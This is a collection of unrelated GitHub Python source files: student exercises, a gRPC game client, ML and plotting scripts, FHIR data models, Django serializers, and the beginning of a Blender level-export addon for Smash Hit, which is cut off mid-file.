+{"seq_id":"17976064085","text":"menu = 0\nenfeite = '=-=' * 7\nvalor_1 = int(input('Primeiro valor: '))\nvalor_2 = int(input('Segundo valor: '))\nwhile menu != 6:\n print('[ 1 ] somar \\n[ 2 ] multiplicar\\n[ 3 ] maior \\n[ 4 ] novos números\\n[ 5 ] potencia\\n[ 6 ] sair do progama')\n menu = int(input('>>>>> Qual é a sua opção ? '))\n if menu == 1:\n soma = valor_1 + valor_2\n print(f'A soma entre {valor_1} + {valor_2} é {soma}') \n elif menu == 2: \n multi = valor_1 * valor_2\n print(f'A multiplicação de {valor_1} X {valor_2} é {multi}')\n elif menu == 3:\n if valor_1 != valor_2:\n if valor_1 > valor_2:\n maior = valor_1\n menor = valor_2\n if valor_1 < valor_2:\n maior = valor_2\n menor = valor_1\n print(f'Entre {valor_1} e {valor_2}, o maior é {maior} e o menor é {menor}')\n elif valor_1 == valor_2:\n print(f'Os valores {valor_1} e {valor_2} são iguais') \n elif menu == 4:\n print('Informe os números novamente:')\n valor_1 = int(input('Primeiro valor: '))\n valor_2 = int(input('Segundo valor: '))\n elif menu == 5:\n escolha = int(input('Você quer que o primeiro ou o segundo valor seja a base ? [1/2] ' ))\n if escolha == 1:\n base = valor_1\n expo = valor_2\n pot = valor_1 ** valor_2\n elif escolha == 2: \n base = valor_2\n expo = valor_1\n pot = valor_2 ** valor_1\n print(f'O resultado do calculo usando {base} como base, e {expo} como expoente. Teremos o valor da potência igual a {pot}')\n if menu != 6:\n print(enfeite)\nprint('-==-==- F I M -==-==-')\n","repo_name":"RuanBarretodosSantos/python","sub_path":"scripts/exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39421050843","text":"print(\"\\n\\n\\n\",\"\\t\\t\\t\\t\\t\\t\", \"Розрахунково-графічна робота\", sep = \"\")\r\nprint(\"\\t\\t\\t\\t\\t\\t\", \"Варіант №22\", sep = \"\")\r\nprint(\"\\n\\n\\n\",\"\\t\\t\\t\\t\", \"Тема:'Програма інтерполювання таблично заданої функції'\", sep = \"\")\r\nprint(\"\\n\\n\\n\",\"\\t\\t\\t\", \"Виконала\",\"\\t\\t\\t\\t\\t\\t\\t\\t\", \"Харчук О.О.\", sep = \"\")\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nwhile True:\r\n try:\r\n n=int(input('Введіть к-сть значень x або y (їх кількість однакова), що задаються:'))\r\n except:\r\n print ('Помилка! К-сть може бути задан лише цілим додатним значенням.')\r\n array = input('Введіть значення x через пробіл (формулювання першого рядка таблиці зі значеннями змінної x):').split()\r\n x=np.array(array, dtype=float)\r\n array = input('Введіть значення y через пробіл (формулювання другого рядка таблиці зі значеннями змінної y):').split()\r\n y=np.array(array, dtype=float)\r\n def lagranz(x,y,t):\r\n z=0\r\n for j in range(len(y)):\r\n p1=1; p2=1\r\n for i in range(len(x)):\r\n if i==j:\r\n p1=p1*1; p2=p2*1 \r\n else: \r\n p1=p1*(t-x[i])\r\n p2=p2*(x[j]-x[i])\r\n z=z+y[j]*p1/p2\r\n return z\r\n xnew=np.linspace(np.min(x),np.max(x),100)\r\n ynew=[lagranz(x,y,i) for i in xnew]\r\n plt.plot(x,y,'o',xnew,ynew)\r\n plt.grid(True)\r\n plt.show()\r\n print('Бажаєте ввести інші значення? Введіть \"так\" або \"ні\".')\r\n while True:\r\n ans = input()\r\n if ans == \"так\" or ans == \"ні\":\r\n break\r\n else:\r\n print('Недопустима відповідь. Введіть так або ні.\\n')\r\n if ans == \"ні\":\r\n print('До зустрічі!')\r\n break\r\n","repo_name":"dianakobzar/RGR_Olefir","sub_path":"rgr km02/Харчук/8 етап/РГР (22 варіант).py","file_name":"РГР (22 варіант).py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8317444328","text":"from __future__ import print_function\n\n\nimport socket\nimport sys\nimport grpc\nimport threading\nimport package.proto.mafiaRPC_pb2_grpc as mafiaGRPC\nfrom package.proto.mafiaRPC_pb2 import Player, Request, PlayerId, Response, Status, SUCCESS, FAIL\nfrom optparse import OptionParser\n\ndefault_player_name = sys.platform\nsession_status = 1\n\n\ndef start_notifier(stub, player):\n try:\n for event in stub.Subscribe(player):\n print('\\n' + event.data)\n if session_status == 0:\n return\n except Exception:\n pass\n\n\ndef start_session(stub, player_name):\n response: PlayerId = stub.GetNewPlayerId(Request(message=''))\n if player_name == default_player_name:\n player_name = f'Guest_{response.id}'\n # print(f'New player with name {player_name} and id {response.id}')\n host_address = socket.gethostbyname(socket.gethostname())\n player = Player(id=response.id, name=player_name, address=host_address)\n while True:\n ans = input('If you want join the game, write \\'yes\\', or no to quit the game: ')\n if ans == 'yes':\n t = threading.Thread(target=start_notifier, args=(stub, player,))\n t.start()\n t.join()\n elif ans == 'no':\n responsez: Response = stub.Unsubscribe(player)\n print('Response status: ', response.status)\n return\n\n\ndef run(address: str, port: str, player_name: str):\n with grpc.insecure_channel(f'{address}:{port}') as channel:\n stub = mafiaGRPC.MafiaClientStub(channel)\n start_session(stub, player_name)\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option(\"-a\", \"--address\", dest=\"address\", default='localhost',\n help='connect to server using custom address')\n parser.add_option(\"-p\", \"--port\", dest=\"port\", default='5345',\n help='connect to server using custom port')\n (options, args) = parser.parse_args()\n name = input('Please input your name: ')\n run(options.address, options.port, name)\n\n","repo_name":"yevzman/SOA_Mafia","sub_path":"Hello_Mafia/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71214341669","text":"#!/usr/bin/env python3\n\nimport click\nfrom textproof.fileio import FileIO\nfrom textproof.checked_text import CheckedText\n\n@click.command()\n@click.argument('path')\n@click.option('--output', default=None, help=\"the path to write to\")\ndef main(path, output):\n file = FileIO(path, output)\n try:\n file.load()\n except FileNotFoundError:\n print(f\"Could not open file {path}\")\n return\n\n check = CheckedText(file.data)\n check.fix_typos()\n file.data = str(check)\n\n file.save()\n\n # import cProfile, pstats\n # with cProfile.Profile() as pr:\n # file = FileIO(path, output)\n # try:\n # file.load()\n # except FileNotFoundError:\n # print(f\"Could not open file {path}\")\n # return\n\n # check = CheckedText(file.data)\n # check.fix_typos()\n # file.data = str(check)\n\n # file.save()\n # stats = pstats.Stats(pr)\n # stats.strip_dirs()\n # stats.sort_stats(pstats.SortKey.CUMULATIVE)\n # stats.print_stats(10)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CodeMouse92/textproof","sub_path":"src/textproof/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73674371111","text":"import matplotlib.pyplot as plt\nfrom glob import glob\nimport numpy as np\n\ndef get_kappa_from_exp(fold):\n\n path = glob('./eval/val_data_fold{}/files_*/kappa_scores_fold_{}_epoch_*.txt'.format(fold, fold))\n L_score = []\n D_score = []\n H_score = []\n Avg_score = []\n epochs = []\n for p in path:\n ep = int(p.split('/')[-1].split('_')[-1][:-4])\n epochs.append(ep)\n f = open(p, \"r\")\n vals = f.read()[1:-2].split(' ')\n vals = list(filter(None, vals))\n L_score.append(float(vals[0]))\n D_score.append(float(vals[1]))\n H_score.append(float(vals[2]))\n Avg_score.append(float(vals[3]))\n pass\n return epochs, L_score, D_score, H_score, Avg_score\n\ndef main():\n # Dictionary mapping split_* to experiment number\n #split_to_exp_tl = {0:7, 1:8, 2:9, 3:10, 4:11, 5:12, 6:13, 8:15, 10:17, 12:19}\n #split_to_exp_notl = {0:20, 1:21, 2:22, 3:23, 4:24, 5:25, 6:26, 8:27, 10:28, 12:29}\n\n exp1 = 1 \n exp2 = 2\n exp3 = 3\n\n colors = ['blue', 'red', 'green']\n # TL\n for i, ex in enumerate([exp3, exp2, exp1]):\n epochs, L_score, D_score, H_score, Avg_score = get_kappa_from_exp(ex)\n idx = np.argsort(epochs)\n epochs = np.array(epochs)[idx]\n L_score = np.array(L_score)[idx]\n D_score = np.array(D_score)[idx]\n H_score = np.array(H_score)[idx]\n Avg_score = np.array(Avg_score)[idx]\n\n plt.plot(epochs, Avg_score, color=colors[i], linestyle='--')\n\n #exp1 = split_to_exp_notl[3]\n #exp2 = split_to_exp_notl[4]\n #exp3 = split_to_exp_notl[5]\n ## NOTL\n #for i, ex in enumerate([exp3, exp2, exp1]):\n # epochs, L_score, D_score, H_score, Avg_score = get_kappa_from_exp(ex)\n # idx = np.argsort(epochs)\n # epochs = np.array(epochs)[idx]\n # L_score = np.array(L_score)[idx]\n # D_score = np.array(D_score)[idx]\n # H_score = np.array(H_score)[idx]\n # Avg_score = np.array(Avg_score)[idx]\n\n # plt.plot(epochs, Avg_score, color=colors[i])\n\n plt.yticks(np.arange(0, 1, 0.1))\n\n plt.xlim([0, 105])\n plt.ylim([0, 1])\n\n plt.xlabel('epochs')\n plt.ylabel('Kappa')\n plt.title('UTime JET')\n plt.legend(('TL 6-shots','TL 3-shots', 'TL 1-shots'), loc = 'best')\n\n plt.savefig('UTime_TL_kappa_scores_s1.png')\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"gmarceca/UTime-PlasmaStates","sub_path":"extra_scripts/plot_kappa_vs_epochs_TL.py","file_name":"plot_kappa_vs_epochs_TL.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33655883011","text":"import cv2\nimport os\nimport numpy as np\nfrom skimage import io\nimport matplotlib.pyplot as plt\nfrom skimage.feature import hog\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import precision_score,recall_score\nimport pickle\n\nTRAIN_COUNT = 300\nTEST_COUNT = 50\n\ndef get_features(object_detect, count, test=False):\n if test:\n img_path = f\"data/test_set/{object_detect}s/{object_detect}.%d.jpg\"\n start = 4011\n else:\n img_path = f\"data/train_set/{object_detect}s/{object_detect}.%d.jpg\"\n start = 100\n\n\n if object_detect == \"cat\":\n labels = np.array([0 for _ in range(count)]).reshape(-1, 1)\n else:\n labels = np.array([1 for _ in range(count)]).reshape(-1, 1)\n\n\n features = list()\n for i in range(start, start+count):\n print(img_path % i)\n # 读取图片\n gray = cv2.imread(img_path % i, cv2.IMREAD_GRAYSCALE)\n # 尺寸缩放\n gray = cv2.resize(gray, (128, 128))\n # 中值滤波\n gray = cv2.medianBlur(gray, 3)\n # HOG特征提取\n hog_image = hog(gray, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(8, 8))\n features.append(hog_image.flatten())\n features = np.array(features)\n return features, labels\n\n\ndef get_predict_img(img_path):\n gray = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n # 尺寸缩放\n gray = cv2.resize(gray, (128, 128))\n # 中值滤波\n gray = cv2.medianBlur(gray, 3)\n normalised_blocks, hog_image = hog(gray, orientations=9, pixels_per_cell=( 8, 8), cells_per_block=(8, 8), visualise=True)\n return hog_image.reshape(1, -1)\n\ncat, cat_labels = get_features(object_detect=\"cat\", count=TRAIN_COUNT)\ndog, dog_labels = get_features(object_detect=\"dog\", count=TRAIN_COUNT)\nimg = np.vstack([cat, dog])\nlabels = np.vstack([cat_labels, dog_labels])\nres = np.hstack([img, labels])\nnp.random.shuffle(res)\n\nclf = SVC(probability=True)\ndata = res[:, :-1]\nlabels = res[:, -1]\nclf.fit(data, labels)\n\n\n# ----------- 预测单张图片 ---------------------------------\n# test_img = get_predict_img(\"training_set/cats/cat.38.jpg\")\n# pred = clf.predict(test_img)\n# print(pred)\n# ----------- 预测单张图片 ---------------------------------\n\ntest_cat, test_cat_labels = get_features(object_detect=\"cat\", count=TEST_COUNT, test=True)\ntest_dog, test_dog_labels = get_features(object_detect=\"dog\", count=TEST_COUNT, test=True)\n\ntest_img = np.vstack([test_cat, test_dog])\ntest_labels = np.vstack([test_cat_labels, test_dog_labels])\n\npred = clf.predict(test_img)\n\nprecision = precision_score(pred,test_labels)\nrecall = recall_score(pred,test_labels)\nprint(\"实际类别:\",test_labels.flatten())\nprint(\"预测类别:\",pred.flatten().astype(int))\nprint(f\"精准率:{precision}, 召回率:{recall}\")\n\n\nwith open(\"model/svm.pkl\",'wb') as f:\n pickle.dump(clf,f)\n","repo_name":"Kuludu/BlindCode","sub_path":"hog/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4920154556","text":"from data_models.patient import Patient\nfrom data_models.condition import Condition\nfrom data_models.specimen import Specimen\nfrom data_models.observation import Observation\nfrom data_models.molecular_sequence import MolecularSequence\n\nimport pandas as pd\n\nclass Bundle:\n resource_type = None\n resources = None\n\n def __init__(self, resource_type, data, data_type='csv', patients=None, specimens=None, molecularSequences=None):\n self.resource_type = resource_type\n if data_type == 'csv':\n self.parse_csv(resource_type, data, patients, specimens, molecularSequences)\n else:\n self.parse_csv(data)\n\n def parse_csv(self, resource_type, data, patients=None, specimens=None, molecularSequences=None):\n self.resources = {}\n if resource_type == 'Patient':\n for index, row in data.iterrows():\n self.resources[row[\"Id\"]] = Patient(row, 'csv')\n elif resource_type == 'Condition':\n disease = data[data['disease'] != 'normal']\n for index, row in disease.iterrows():\n self.resources[row[\"individual\"]] = Condition(row, 'csv', patients)\n elif resource_type == 'Specimen':\n for index, row in data.iterrows():\n self.resources[row[\"sample\"]] = Specimen(row, 'csv', patients)\n elif resource_type == 'MolecularSequence':\n for index, row in data.iterrows():\n self.resources[row[\"gene_id\"]] = MolecularSequence(row, 'csv')\n elif resource_type == 'Observation':\n for index, row in data.iterrows():\n for sk, sv in specimens.resources.items():\n self.resources[sk + ':' + row['Gene ID']] = Observation(row, 'csv',\n patients = patients,\n specimens = specimens,\n specimenId = sk,\n molecularSequences = molecularSequences)\n\n def upload(self, server):\n for res in self.resources.values():\n res.upload(server)\n\n def update(self, server, print_json=False):\n for res in self.resources.values():\n res.print_json = print_json\n res.update(server)\n\n def print(self, print_json=False):\n print(f'Bundle of: {self.resource_type}')\n for r in self.resources.values():\n r.print_json = print_json\n print(r)\n","repo_name":"frankkramer-lab/gene-expression-on-fhir","sub_path":"data_processing/data_models/bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"19714985003","text":"import pandas\nimport gzip\n\nclass ReadData:\n \n\tdef __init__(self, filename,dialect):\n\t\tif filename.split('.')[-1] == 'gz':\n\t\t\tself.datafile = gzip.open(filename, newline='')\n\t\telse:\n\t\t\tself.datafile = open(filename, newline='')\n\t\tself.dialect = dialect\n\t\tself.__read_data()\n\t\t\n\t# Read data using pandas. Simplify data structure for Configuration\n\tdef __read_data(self):\n\t\t# This outputs a dataframe as is\n\t\tif self.dialect == \"SAMoS\":\n\t\t\t# this has a # in front of the header, and I cannot seem to tell python to disregard it (and not come up as 'unnamed')\n\t\t\t# as a result, all the columns labels are shifted one to the left\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0,sep = '\\s+')\n\t\t\ttemp = self.data.columns\n\t\t\tcolshift = {}\n\t\t\tfor u in range(len(temp)-1): \n\t\t\t\tcolshift[temp[u]] = temp[u+1]\n\t\t\tself.data.rename(columns = {temp[len(temp)-1]: 'garbage'},inplace=True)\n\t\t\tself.data.rename(columns = colshift,inplace=True,errors=\"raise\")\n\t\t\t#print(self.data.columns)\n\t\telif self.dialect == \"CCCPy\":\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0)\n\t\t\t# look of the header\n\t\t\t# currTime,xPos,yPos,xVel,yVel,polAngle,polVel,xPol,yPol,rad,glued\n\t\t\t# We need to muck about with the headers to distil this to a unified format\n\t\t\t# Classical samos header:\n\t\t\t# id type flag radius x y z vx vy vz nx ny nz \n\t\t\tself.data.rename(columns={\"xPos\": \"x\", \"yPos\": \"y\", \"xVel\": \"vx\", \"yVel\": \"vy\", \"xPol\": \"nx\", \"yPol\": \"ny\", \"rad\":\"radius\", \"glued\":\"type\"}, inplace=True,errors=\"raise\")\n\t\t\t#print(self.data.columns)\n\t\telif self.dialect == \"CAPMD\":\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0)\n\t\telse:\n\t\t\tprint(\"Unknown data format dialect!\")\n\t\t\n\n","repo_name":"silkehenkes/SAMoSA","sub_path":"read_data_csv.py","file_name":"read_data_csv.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"20111090277","text":"import re\n\nstr = \"01024956962\"\npattern = re.compile(r\"(\\d{3})(\\d{4})(\\d{4})\")\n\nnew_str = pattern.sub( r\"\\1-\\2-\\3\", str )\nprint( new_str )\n\n#result = re.match( pattern, str )\n#if result:\n# phone = '-'.join(result.groups())\n#\n#print(phone)\n","repo_name":"popsof/pda","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21826809761","text":"#\n# @lc app=leetcode id=881 lang=python3\n#\n# [881] Boats to Save People\n#\n\n# @lc code=start\nclass Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n people.sort()\n left = 0\n right = len(people)-1\n\n boatCount = 0\n while left <= right:\n if people[left] + people[right] <= limit:\n left += 1\n\n right -= 1\n boatCount += 1\n\n return boatCount\n\n\n# @lc code=end\n","repo_name":"derryltaufik/leetcode","sub_path":"881.boats-to-save-people.py","file_name":"881.boats-to-save-people.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"30682690750","text":"\nfrom drafts import gmail_create_draft\nimport string\n\nstop_words = open(\"stopwords.txt\", encoding=\"utf-8\").read()\n\nfrom collections import Counter\n\nimport matplotlib.pyplot as plt\nkh = input(\"Enter the content for the email: \")\nto = input(\"Enter the recipient mail id: \")\nfro_m = input(\"Enter your email id: \")\nsub = input('Enter the subject of the email: ')\ngmail_create_draft(to, fro_m, sub, kh)\n\nsent = kh\nlower_case = sent.lower()\n\ncleaned_text = lower_case.translate(str.maketrans('', '', string.punctuation))\n\ntokenized_words = cleaned_text.split()\n\nfinal_words = []\nfor word in tokenized_words:\n if word not in stop_words:\n final_words.append(word)\n\n\nemotion_list = []\nwith open('emotions.txt', 'r') as file:\n for line in file:\n clear_line = line.replace(\"\\n\", '').replace(\",\", '').replace(\"'\", '').strip()\n word, emotion = clear_line.split(':')\n\n if word in final_words:\n emotion_list.append(emotion)\n\nw = Counter(emotion_list)\nprint(\" The emotion of the mail is \", w)\n\nfig, ax1 = plt.subplots()\nax1.bar(w.keys(), w.values())\nfig.autofmt_xdate()\nplt.savefig('graph.png')\nplt.show()\n\n\n\n","repo_name":"Dhanush17raj/Sentiment_analysis-gmail_api","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1901885789","text":"def solution(enter, leave):\n answer = []\n room = []\n N = len(enter)\n cnt = [[0]*(N+1) for _ in range((N+1))]\n while True:\n if enter:\n room.append(enter.pop(0))\n if room[-1] == leave[0]:\n n = len(room)\n if n > 1:\n for i in range(n):\n for j in range(n):\n if room[i] != room[j]:\n cnt[room[i]][room[j]] += 1\n room.pop(-1)\n leave.pop(0)\n while True:\n if leave and leave[0] in room:\n room.pop(room.index(leave[0]))\n leave.pop(0)\n else:\n break\n if len(leave) == 0:\n break\n for i in range(1, N+1):\n answer.append(N-cnt[i].count(0)+1)\n return answer\n\nsolution([1,3,2], [1,2,3])\nsolution([1,4,2,3], [2,1,3,4])\nsolution([3,2,1], [2,1,3])\nsolution([3,2,1], [1,3,2])\nsolution([1,4,2,3], [2,1,4,3])","repo_name":"Lee-sungheon/TIL","sub_path":"coding_test/line3.py","file_name":"line3.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20941657280","text":"from rest_framework.reverse import reverse\nfrom rest_framework.serializers import (\n HyperlinkedModelSerializer,\n HyperlinkedRelatedField,\n ModelSerializer,\n SerializerMethodField,\n)\nfrom .models import Tag, Company, Partner, Job\n\n\nclass TagSerializer(HyperlinkedModelSerializer):\n \"\"\"Serializer for Tag data\"\"\"\n class Meta:\n model = Tag\n fields = \"__all__\"\n extra_kwargs = {\n \"url\": {\n \"lookup_field\": \"slug\",\n \"view_name\": \"api-tag-detail\",\n }\n }\n\n\nclass CompanySerializer(ModelSerializer):\n \"\"\"Serializer for Company data\"\"\"\n tags = TagSerializer(many=True, read_only=True)\n\n class Meta:\n model = Company\n exclude = (\"id\",)\n\n\nclass PartnerSerializer(CompanySerializer):\n \"\"\"Serializer for Partner data\"\"\"\n class Meta:\n model = Partner\n exclude = (\"id\",)\n\n\nclass JobSerializer(ModelSerializer):\n \"\"\"Serializer for Job data\"\"\"\n partner = HyperlinkedRelatedField(\n queryset=Partner.objects.all(),\n lookup_field=\"slug\",\n view_name=\"api-partner-detail\",\n )\n tags = TagSerializer(many=True, read_only=True)\n class Meta:\n model = Job\n exclude = (\"id\",)\n","repo_name":"Kinnect-Careers/kinnect_app_dj","sub_path":"src/organizer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29858313257","text":"\"\"\"\nMain file for Shatter tools\n\"\"\"\n\nimport common as common\n\nSH_MAX_STR_LEN = common.MAX_STRING_LENGTH\n\nimport xml.etree.ElementTree as et\nimport bpy\nimport gzip\nimport random\nimport os\nimport webbrowser\nimport tempfile\nimport secrets\nimport obstacle_db\nimport segment_export\nimport segment_import\nimport segstrate\nimport extra_tools\nimport quick_test\nimport updater\nimport autogen\nimport remote_api\nimport util\nimport butil\nimport level_pack_ui\n\nfrom bpy.props import (\n\tStringProperty,\n\tBoolProperty,\n\tIntProperty,\n\tIntVectorProperty,\n\tFloatProperty,\n\tFloatVectorProperty,\n\tEnumProperty,\n\tPointerProperty,\n)\n\nfrom bpy.types import (\n\tPanel,\n\tMenu,\n\tOperator,\n\tPropertyGroup,\n\tAddonPreferences,\n)\n\nfrom bpy_extras.io_utils import ImportHelper\n\n# The name of the test server. If set to false initially, the test server will\n# be disabled.\ng_process_test_server = True\n\n# :-3\ng_got_ricked = False\n\ndef get_prefs():\n\t\"\"\"\n\tGet a reference to the addon preferences\n\t\"\"\"\n\t\n\treturn bpy.context.preferences.addons[\"shatter\"].preferences\n\nclass ExportHelper2:\n\t\"\"\"\n\tExtended from blender's default ExportHelper to fix some bugs.\n\t\"\"\"\n\t\n\tfilepath: StringProperty(\n\t\tname = \"File Path\",\n\t\tdescription = \"Filepath used for exporting the file\",\n\t\tmaxlen = 1024,\n\t\tsubtype = 'FILE_PATH',\n\t)\n\t\n\tcheck_existing: BoolProperty(\n\t\tname = \"Check Existing\",\n\t\tdescription = \"Check and warn on overwriting existing files\",\n\t\tdefault = True,\n\t\toptions = {'HIDDEN'},\n\t)\n\t\n\t# subclasses can override with decorator\n\t# True == use ext, False == no ext, None == do nothing.\n\tcheck_extension = True\n\t\n\tdef invoke(self, context, _event):\n\t\tif not self.filepath:\n\t\t\tblend_filepath = context.blend_data.filepath\n\t\t\tif not blend_filepath:\n\t\t\t\tblend_filepath = \"untitled\"\n\t\t\telse:\n\t\t\t\tblend_filepath = os.path.splitext(blend_filepath)[0]\n\t\t\t\n\t\t\tself.filepath = blend_filepath + self.filename_ext\n\t\t\n\t\tcontext.window_manager.fileselect_add(self)\n\t\treturn {'RUNNING_MODAL'}\n\t\n\tdef check(self, _context):\n\t\t\"\"\"\n\t\tCustom version of filepath check that fixes issues with two dots in names\n\t\t\"\"\"\n\t\t\n\t\tchange_ext = False\n\t\t\n\t\tif self.check_extension is not None and self.check_extension:\n\t\t\tif not self.filepath.endswith(self.filename_ext):\n\t\t\t\tself.filepath += self.filename_ext\n\t\t\t\tchange_ext = True\n\t\t\n\t\treturn change_ext\n\nclass sh_ExportCommon(bpy.types.Operator, ExportHelper2):\n\t\"\"\"\n\tCommon code and values between export types\n\t\"\"\"\n\t\n\tsh_meshbake_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"A relitive or full path to the template file used for baking meshes. 
If you use APK Editor Studio and the Smash Hit APK is open, the path to the file will be pre-filled\",\n\t\tdefault = \"\",\n\t\tsubtype = \"FILE_PATH\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tAutomatic templates.xml detection\n\t\t\"\"\"\n\t\t\n\t\tif (not self.sh_meshbake_template):\n\t\t\tself.sh_meshbake_template = segment_export.tryTemplatesPath()\n\nclass sh_export(sh_ExportCommon):\n\t\"\"\"\n\tUncompressed segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export\"\n\tbl_label = \"Export Segment\"\n\t\n\tfilename_ext = \".xml.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export(self, context):\n\tself.layout.operator(\"shatter.export\", text=\"Segment (.xml.mp3)\")\n\nclass sh_export_gz(sh_ExportCommon):\n\t\"\"\"\n\tCompressed segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_compressed\"\n\tbl_label = \"Export Compressed Segment\"\n\t\n\tfilename_ext = \".xml.gz.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.gz.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tcompress = True,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_gz(self, context):\n\tself.layout.operator(\"shatter.export_compressed\", text=\"Compressed Segment (.xml.gz.mp3)\")\n\nclass sh_export_auto(bpy.types.Operator):\n\t\"\"\"\n\tAuto find APK path and use level/room/segment name to export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_auto\"\n\tbl_label = \"Export to APK\"\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tNone,\n\t\t\tcontext,\n\t\t\tcompress = True,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"sh_meshbake_template\": segment_export.tryTemplatesPath(),\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"auto_find_filepath\": True,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_auto(self, context):\n\tself.layout.operator(\"shatter.export_auto\", text=\"Shatter: Export to APK\")\n\nclass sh_export_test(Operator):\n\t\"\"\"\n\tCompressed segment 
